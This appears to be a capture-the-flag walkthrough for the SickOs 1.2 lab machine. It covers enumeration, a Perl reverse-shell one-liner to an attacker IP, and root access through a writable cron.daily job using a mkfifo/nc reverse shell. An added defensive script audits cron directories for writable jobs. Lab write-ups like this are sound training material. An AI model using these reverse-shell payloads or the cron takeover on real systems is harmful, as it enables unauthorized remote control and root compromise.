SickOs: 1.2 Walkthrough
“So in war, the way is to avoid what is strong, and strike at what is weak.” ― Sun Tzu, The Art of War
This is the second in the SickOs series and is independent of the prior releases. The scope of the challenge is to gain the highest privileges on the system.
Enumeration
It all starts with enumeration.
📍 We might have to get credentials from the web page and use them to access SSH.
📍 We might have LFI/SQLi/RCE on the web page.
📍 Could be something new…
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10–4.11, Linux 3.16–4.6, Linux 3.2–4.9, Linux 4.4
OpenSSH 5.9p1 Debian 5ubuntu1.8
🔑 It is running Linux (Ubuntu)
More Enumeration…
1. SSH
Just a user enumeration vulnerability.
2. HTTP
- Manual Walk + robots.txt + source code
Nothing on this.
- Nikto scan
- Gobuster
Finding POI (Point Of Intrusion)
No luck with these vulnerabilities.
perl -e 'use Socket;$i="192.168.103.195";$p=443;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Got a reverse shell back on port 443.
Privilege Escalation
Found a vulnerable cron job. It is present in /etc/cron.daily.
Do the following to get a root shell back…
echo '#!/bin/bash' > update
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.43.2 443 >/tmp/f' >> update
chmod 777 update
Catch the shell when the job is executed.
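The escalation above works because a job that root runs from /etc/cron.daily ends up executing a file an unprivileged user created (`update`). The following is an added defender-side audit, not part of the original walkthrough: it flags cron job files that non-owners can edit and absolute paths named in a job that sit in world-writable locations. The helper names `has_perm` and `audit_cron_dir` and the path-extraction heuristic are assumptions made for this example.

```shell
#!/bin/sh
# Added example (not from the walkthrough): flag daily cron jobs that an
# unprivileged user could influence. Helper names are hypothetical.

# Succeeds when $1 exists and carries the permission bit(s) given in $2.
# find -L follows symlinks so that links such as /bin/sh are not misreported.
has_perm() {
    [ -e "$1" ] && [ -n "$(find -L "$1" -prune -perm "$2" -print 2>/dev/null)" ]
}

audit_cron_dir() {
    for job in "$1"/*; do
        [ -f "$job" ] || continue
        # 1. The job file itself must not be writable by group or others.
        if has_perm "$job" -0020 || has_perm "$job" -0002; then
            echo "WRITABLE_JOB $job"
        fi
        # 2. Heuristic (assumption): treat every absolute path in the job
        #    text as something the job may execute or read as root.
        grep -oE '/[A-Za-z0-9_.+/-]+' "$job" | sort -u |
        while IFS= read -r target; do
            if has_perm "$target" -0002; then
                # Anyone can overwrite the existing target.
                echo "WRITABLE_TARGET $job $target"
            elif has_perm "$(dirname "$target")" -0002; then
                # Anyone can create the target if it is missing (a sticky
                # bit only blocks replacing files owned by other users).
                echo "PLANTABLE_TARGET $job $target"
            fi
        done
    done
}

# Audit the directory given as the first argument, if any,
# e.g.: sh audit.sh /etc/cron.daily
if [ "$#" -gt 0 ]; then
    audit_cron_dir "$1"
fi
```

The text scan only sees paths written in the job file itself. A job that calls another program which in turn executes a file from a world-writable directory has to be reviewed by auditing that program as well.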